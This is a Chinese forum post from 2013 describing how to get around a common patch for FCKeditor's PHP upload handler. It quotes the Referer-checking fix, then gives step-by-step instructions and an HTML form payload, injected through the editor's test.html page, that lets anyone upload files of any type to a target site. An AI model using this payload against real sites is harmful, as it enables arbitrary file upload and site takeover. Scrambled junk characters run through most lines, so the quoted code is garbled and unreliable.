找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2175|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
3 e- k- ^: O4 t网上给出的修复方案是
( ]! `1 G, R: Q, Q修复方法,删除FCK编辑器用其他的编辑器. E5 f) I+ f0 }/ Y
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件- ~; d+ D6 L8 l2 |, D" U8 |

- ~! Q2 I, h' C% P# N3 Krequire(‘config.php’);
( j1 v6 G- k2 X. ~require(‘util.php’);# W4 {" [4 Z) q! i9 J" w: y# X
的下面添加以下代码—————————–
8 U+ ^9 t' o7 Y7 x//防止外部提交6 F7 g1 I9 d4 o) t6 Z
function outsidepost()  I3 {& E& B: Y
{
, X. H9 f, n2 i$servername=$_SERVER['SERVER_NAME'];
  b1 V4 ^  `( R' Q$sub_from=@$_SERVER['HTTP_REFERER'];! r1 G) H* w. w4 A& a( H' i
$sub_len=strlen($servername);; g& x0 `7 L) A5 i
$checkfrom=substr($sub_from,7,$sub_len);& P: R5 L' m, U
if($checkfrom!=$servername){! d/ c( V' J2 W( n
echo(“you don’t outsidepost!”);
! y$ y# z: ~9 O6 |  Xexit;
/ s) A5 u* }0 D/ E+ m# D}
, m0 _+ I7 M0 `* T* s/ u. R}$ d2 T: m9 P& t, p0 F+ d; m
outsidepost();8 D! g' Y" v0 I3 C7 L
防止外部提交,但是没有防止内部提交,3 [% j/ v: Q0 u1 p. W8 Z  L# M5 l; ]
利用方法:
7 [/ D/ p  T% o5 a0 ~" i1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
, D7 s1 d& i- L+ O* ]3 z6 E2,在Current Folder 框输入1 i2 M! e# J9 j" A3 u0 S
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
5 q( t% v( Z3 D3 L3 _( w6 \然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。) p3 R( d0 e, K6 d: ~. T9 w- V
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表